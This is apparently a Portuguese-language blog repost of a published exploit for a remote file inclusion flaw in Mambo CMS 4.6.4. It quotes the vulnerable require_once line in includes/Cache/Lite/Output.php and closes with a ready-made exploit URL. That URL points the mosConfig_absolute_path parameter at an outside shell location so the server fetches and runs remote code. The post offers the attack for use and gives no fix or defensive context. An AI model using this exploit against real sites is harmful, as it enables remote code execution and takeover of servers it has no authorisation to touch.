em Sem categoria

Exploit Mambo 4.6.4 ( Remote File Inclusion Vulnerability )

Foi publicado rescentemente no site packetstormsecurity.com um exploit para o Mambo 4.6.4 no qual habilita a execução remota de comandos, o código e exemplo de utilização estão abaixo:

.-----------------------------------------------------------------------------.
|  vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability                  |
|  download: http://mambo-foundation.org/                                     |
|                                                                             |
|  author: [email protected]                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: all friends  ;)                                                   |
'-----------------------------------------------------------------------------'

# code:

/includes/Cache/Lite/Output.php :
1     <?php
2
3     /**
4     * This class extends Cache_Lite and uses output buffering to get the data to cache.
5     *
6     * There are some examples in the 'docs/examples' file
7     * Technical choices are described in the 'docs/technical' file
8     *
9     * @package Cache_Lite
10     * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11     * @author Fabien MARTY <[email protected]>
12     */
13
14     require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
...

^ no comment.. RFI in line 14..

# exploit:

http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?